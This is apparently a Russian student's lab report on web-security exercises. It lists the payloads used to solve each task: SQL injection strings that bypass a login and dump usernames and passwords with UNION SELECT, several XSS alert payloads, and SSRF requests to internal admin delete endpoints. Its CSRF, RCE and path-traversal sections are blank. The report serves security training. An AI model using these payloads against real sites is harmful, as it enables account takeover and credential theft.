# Отчёт по Пр. Заданию 3
###### tags: `Web basic`
Итоговая статистика пройденных атак


SQL-injection уязвимости:
1. Ввел в поле UserName строку: administrator'--

2. В запросе в поисковой строке сверху после category= добавил строку ' or true --

3. В запросе в поисковой строке сверху была вставлена строка: ' UNION SELECT username, password from users-- . Тем самым получив логины и пароли пользователей из соответствующей таблицы. Далее введены в форму логина данные пользователя administrator.

4. В программе Burp был отправлен запрос который можно увидеть на скрине.

XSS уязвимости:
1. В коммендариях к новости был вставлен код: <script>alert(1)</script>

2. В поиске вставлена строка: \"\>\<svg onload=alert(1)>

3. В поиске вставлена строка: '-alert(1)-'

4. В поиске вставлена строка: \\"-alert(1)}//

CSRF:
1.

2.

SSRF:
1. Был проведён такой запрос: http://localhost/admin/delete?username=carlos

2. Был проведён такой запрос:
/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

RCE:
1.

Path traversal:
1.

2.
